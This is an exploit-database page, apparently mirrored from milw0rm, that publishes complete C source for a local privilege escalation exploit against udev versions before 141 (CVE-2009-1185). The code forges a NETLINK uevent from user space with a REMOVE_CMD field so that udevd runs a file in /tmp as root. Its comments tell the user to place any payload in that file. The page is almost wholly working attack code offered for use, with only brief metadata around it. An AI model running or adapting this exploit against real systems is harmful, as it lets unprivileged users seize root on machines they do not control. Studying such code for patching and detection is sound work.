Lucene search
RootSSV:66499
HistoryJul 01, 2014 - 12:00 a.m.
Linux Kernel 2.6 UDEV < 141 - Local Privilege Escalation Exploit

2014-07-0100:00:00
Root
www.seebug.org
0.0005 Low
EPSS
Percentile
13.2%
JSON
No description provided by source.

                                                /*
 * cve-2009-1185.c
 *
 * udev &#60; 141 Local Privilege Escalation Exploit
 * Jon Oberheide &#60;[email protected]&#62;
 * http://jon.oberheide.org
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
 *
 *   udev before 1.4.1 does not verify whether a NETLINK message originates 
 *   from kernel space, which allows local users to gain privileges by sending 
 *   a NETLINK message from user space.
 *
 * Notes:
 *   
 *   An alternate version of kcope&#39;s exploit.  This exploit leverages the 
 *   95-udev-late.rules functionality that is meant to run arbitrary commands 
 *   when a device is removed.  A bit cleaner and reliable as long as your 
 *   distro ships that rule file.
 *
 *   Tested on Gentoo, Intrepid, and Jaunty.
 *
 * Usage:
 *
 *   Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, 
 *   usually is the udevd PID minus 1) as argv[1].
 *
 *   The exploit will execute /tmp/run as root so throw whatever payload you 
 *   want in there.
 */

#include &#60;stdio.h&#62;
#include &#60;string.h&#62;
#include &#60;stdlib.h&#62;
#include &#60;unistd.h&#62;
#include &#60;sys/types.h&#62;
#include &#60;sys/stat.h&#62;
#include &#60;sys/socket.h&#62;
#include &#60;linux/types.h&#62;
#include &#60;linux/netlink.h&#62;

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

int
main(int argc, char **argv)
{
	int sock;
	char *mp, *err;
	char message[4096];
	struct stat st;
	struct msghdr msg;
	struct iovec iovector;
	struct sockaddr_nl address;

	if (argc &#60; 2) {
		err = &#34;Pass the udevd netlink PID as an argument&#34;;
		printf(&#34;[-] Error: %s\n&#34;, err);
		exit(1);
	}

	if ((stat(&#34;/etc/udev/rules.d/95-udev-late.rules&#34;, &st) == -1) &&
	    (stat(&#34;/lib/udev/rules.d/95-udev-late.rules&#34;, &st) == -1)) {
		err = &#34;Required 95-udev-late.rules not found&#34;;
		printf(&#34;[-] Error: %s\n&#34;, err);
		exit(1);
	}

	if (stat(&#34;/tmp/run&#34;, &st) == -1) {
		err = &#34;/tmp/run does not exist, please create it&#34;;
		printf(&#34;[-] Error: %s\n&#34;, err);
		exit(1);
	}
	system(&#34;chmod +x /tmp/run&#34;);

	memset(&address, 0, sizeof(address));
	address.nl_family = AF_NETLINK;
	address.nl_pid = atoi(argv[1]);
	address.nl_groups = 0;

	msg.msg_name = (void*)&address;
	msg.msg_namelen = sizeof(address);
	msg.msg_iov = &iovector;
	msg.msg_iovlen = 1;

	sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
	bind(sock, (struct sockaddr *) &address, sizeof(address));

	mp = message;
	mp += sprintf(mp, &#34;remove@/d&#34;) + 1;
	mp += sprintf(mp, &#34;SUBSYSTEM=block&#34;) + 1;
	mp += sprintf(mp, &#34;DEVPATH=/dev/foo&#34;) + 1;
	mp += sprintf(mp, &#34;TIMEOUT=10&#34;) + 1;
	mp += sprintf(mp, &#34;ACTION=remove&#34;) +1;
	mp += sprintf(mp, &#34;REMOVE_CMD=/tmp/run&#34;) +1;

	iovector.iov_base = (void*)message;
	iovector.iov_len = (int)(mp-message);

	sendmsg(sock, &msg, 0);

	close(sock);

	return 0;
}

// milw0rm.com [2009-04-30]
0.0005 Low
EPSS
Percentile
13.2%
JSON
Linux Kernel 2.6 UDEV < 141 - Local Privilege Escalation Exploit

Related
